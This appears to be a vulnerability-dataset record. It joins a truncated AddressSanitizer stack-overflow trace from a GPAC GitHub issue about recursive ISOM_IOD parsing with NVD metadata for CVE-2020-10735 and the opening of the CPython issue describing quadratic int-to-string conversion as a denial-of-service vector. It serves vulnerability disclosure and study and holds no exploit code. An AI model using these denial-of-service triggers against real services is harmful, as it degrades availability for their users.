gf_odf_read_descriptor odf/desc_private.c:292 #52 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #53 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #54 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #55 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #56 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #57 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #58 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #59 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #60 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #61 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #62 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #63 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #64 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #65 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #66 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #67 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #68 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #69 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #70 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #71 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #72 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #73 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #74 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #75 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #76 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #77 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #78 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #79 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #80 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #81 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #82 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #83 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #84 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #85 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #86 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #87 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #88 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #89 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #90 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #91 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #92 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #93 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #94 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #95 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #96 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #97 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #98 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #99 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #100 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #101 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #102 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #103 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #104 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #105 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #106 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #107 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #108 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #109 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #110 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #111 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #112 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #113 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #114 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #115 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #116 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #117 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #118 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #119 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #120 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #121 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #122 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #123 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #124 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #125 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #126 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #127 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #128 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #129 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #130 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #131 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #132 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #133 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #134 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #135 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #136 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #137 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #138 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #139 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #140 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #141 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #142 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #143 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #144 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #145 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #146 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #147 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #148 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #149 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #150 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #151 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #152 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #153 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #154 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #155 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #156 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #157 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #158 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #159 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #160 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #161 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #162 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #163 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #164 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #165 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #166 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #167 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #168 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #169 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #170 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #171 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #172 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #173 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #174 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #175 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #176 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #177 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #178 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #179 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #180 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #181 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #182 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #183 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #184 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #185 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #186 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #187 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #188 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #189 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #190 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #191 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #192 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #193 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #194 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #195 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #196 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #197 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #198 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #199 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #200 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #201 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #202 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #203 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #204 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #205 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #206 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #207 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #208 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #209 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #210 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #211 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #212 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #213 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #214 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #215 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #216 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #217 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #218 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #219 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #220 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #221 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #222 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #223 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #224 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #225 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #226 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #227 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #228 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #229 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #230 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #231 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #232 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #233 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #234 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #235 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #236 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #237 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #238 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #239 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #240 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #241 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #242 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #243 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #244 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #245 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #246 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #247 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #248 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #249 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #250 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 SUMMARY: AddressSanitizer: stack-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x10364c) ==15396==ABORTING ```
AddressSanitizer: stack-overflow when processing ISOM_IOD
https://api.github.com/repos/gpac/gpac/issues/2216/comments
0
2022-07-02T17:45:58Z
2022-07-12T17:13:10Z
https://github.com/gpac/gpac/issues/2216
1,292,105,535
2,216
CVE-2020-10735
2022-09-09T14:15:08.660
A flaw was found in python. In algorithms with quadratic time complexity using non-binary bases, when using int("text"), a system could take 50ms to parse an int string with 100,000 digits and 5s for 1,000,000 digits (float, decimal, int.from_bytes(), and int() for binary bases 2, 4, 8, 16, and 32 are not affected). The highest threat from this vulnerability is to system availability.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2022/09/21/1" }, { "source": "secalert@redhat.com", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2022/09/21/4" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2020-10735" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1834423" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://docs.google.com/document/d/1KjuF_aXlzPUxTK4BMgezGJ2Pn7uevfX7g0_mvgHlL7Y" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/python/cpython/issues/95778" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00039.html" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2VCU6EVQDIXNCEDJUCTFIER2WVNNDTYZ/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/32AAQKABEKFCB5DDV5OONRZK6BS23HPW/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4EWKR2SPX3JORLWCXFY3KN2U5B5CIUQQ/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6XL6E5A3I36TRR73VNBOXNIQP4AMZDFZ/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/76YE7AM37MRU76XJV4M27CWDAMUGNRYK/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HSRPVJZL6DJFWKYRHMNJB7VCEUCBKRF5/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IFGV7P2PYFBMK32OKHCAC2ZPJQV5AUDF/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NHC6IUU7CLRQ3QLPWUXLONSG3SXFTR47/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OKYE2DOI2X7WZXAWTQJZAXYIWM37HDCY/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OT5U223OE5ZOUHZAZYSYSWVJQIKDE73E/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OT5WQB7Z3CXOWVBD2AFAHYPA5ONYFFZ4/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PD7FTLJOIGMUSCDR3JAN6WRFHJEE4PH5/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SZYJSGLSCQOKXXFVJVJQAXLEOJBIWGEL/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TD7JDDKJXK6D26XAN3YRFNM2LAJHT5UO/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TMWPRAAJS7I6U3U45V7GZVXWNSECI22M/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/U4ZZV4CDFRMTPDBI7C5L43RFL3XLIGUY/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UBPDVCDIUCEBE7C4NAGNA2KQJYOTPBAZ/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/V7ZUJDHK7KNG6SLIFXW7MNZ6O2PUJYK6/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WXF6MQ74HVIDDSR5AE2UDR24I6D4FEPC/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZEOAJWGGY55QU35UM2OVZATBW5MX2OZD/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*", "matchCriteriaId": "0743C1B3-D44D-4940-AAF4-25DEFB46AC74", "versionEndExcluding": "3.7.14", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "3.7.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*", "matchCriteriaId": "5E28EB81-9BE6-4EC9-AC44-EFA4DDB0233F", "versionEndExcluding": "3.8.14", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "3.8.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*", "matchCriteriaId": "24517651-FDBB-4867-99A6-25E12EE8A117", "versionEndExcluding": "3.9.14", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "3.9.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*", "matchCriteriaId": "6D795AAC-B427-4067-99F3-D36B0F936ACB", "versionEndExcluding": "3.10.7", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "3.10.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.11.0:alpha1:*:*:*:*:*:*", "matchCriteriaId": "514A577E-5E60-40BA-ABD0-A8C5EB28BD90", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.11.0:alpha2:*:*:*:*:*:*", "matchCriteriaId": "83B71795-9C81-4E5F-967C-C11808F24B05", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.11.0:alpha3:*:*:*:*:*:*", "matchCriteriaId": "3F6F71F3-299E-4A4B-ADD1-EAD5A1D433E2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.11.0:alpha4:*:*:*:*:*:*", "matchCriteriaId": "D9BBF4E9-EA54-41B5-948E-8E3D2660B7EF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.11.0:alpha5:*:*:*:*:*:*", "matchCriteriaId": "AEBFDCE7-81D4-4741-BB88-12C704515F5C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.11.0:alpha6:*:*:*:*:*:*", "matchCriteriaId": "156EB4C2-EFB7-4CEB-804D-93DB62992A63", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.11.0:alpha7:*:*:*:*:*:*", "matchCriteriaId": "8CC972AE-16A8-4B74-A3E7-36BCDD7C1ED3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.11.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "554015CB-0325-438B-8C11-0F85F54ABC50", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.11.0:beta2:*:*:*:*:*:*", "matchCriteriaId": "8037C129-0030-455E-A359-98E14D1498D4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.11.0:beta3:*:*:*:*:*:*", "matchCriteriaId": "7C3DC43B-72CC-4FC5-8072-F051FB47F6D1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.11.0:beta4:*:*:*:*:*:*", "matchCriteriaId": "6657ED60-908B-48E6-B95B-572E57CFBB69", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.11.0:beta5:*:*:*:*:*:*", "matchCriteriaId": "1EF628A1-82F5-403C-B527-388C13507CDF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.11.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "3055A198-13F8-42C0-8FD7-316AA8984A8A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:quay:3.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "B1987BDA-0113-4603-B9BE-76647EB043F2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:software_collections:-:*:*:*:*:*:*:*", "matchCriteriaId": "749804DA-4B27-492A-9ABA-6BB562A6B3AC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*", "matchCriteriaId": "5C675112-476C-4D7C-BCB9-A2FB2D0BC9FD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:37:*:*:*:*:*:*:*", "matchCriteriaId": "E30D0E6F-4AE8-4284-8716-991DFA48CC5D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/python/cpython/issues/95778
[ "Patch", "Third Party Advisory" ]
github.com
[ "python", "cpython" ]
## Problem A Denial Of Service (DoS) issue was identified in CPython because we use binary bignum’s for our `int` implementation. A huge integer will always consume a near-quadratic amount of CPU time in conversion to or from a base 10 (decimal) string with a large number of digits. No efficient algorithm exists to do otherwise. It is quite common for Python code implementing network protocols and data serialization to do `int(untrusted_string_or_bytes_value)` on input to get a numeric value, without having limited the input length or to do `log("processing thing id %s", unknowingly_huge_integer)` or any similar concept to convert an `int` to a string without first checking its magnitude. (`http`, `json`, `xmlrpc`, `logging`, loading large values into integer via linear-time conversions such as hexadecimal stored in `yaml`, or anything computing larger values based on user controlled inputs… which then wind up attempting to output as decimal later on). All of these can suffer a CPU consuming DoS in the face of untrusted data. Everyone auditing all existing code for this, adding length guards, and maintaining that practice everywhere is not feasible nor is it what we deem the vast majority of our users want to do. This issue has been reported to the Python Security Response Team multiple times by a few different people since early 2020, most recently a few weeks ago while I was in the middle of polishing up the PR so it’d be ready before 3.11.0rc2. ## Mitigation After discussion on the Python 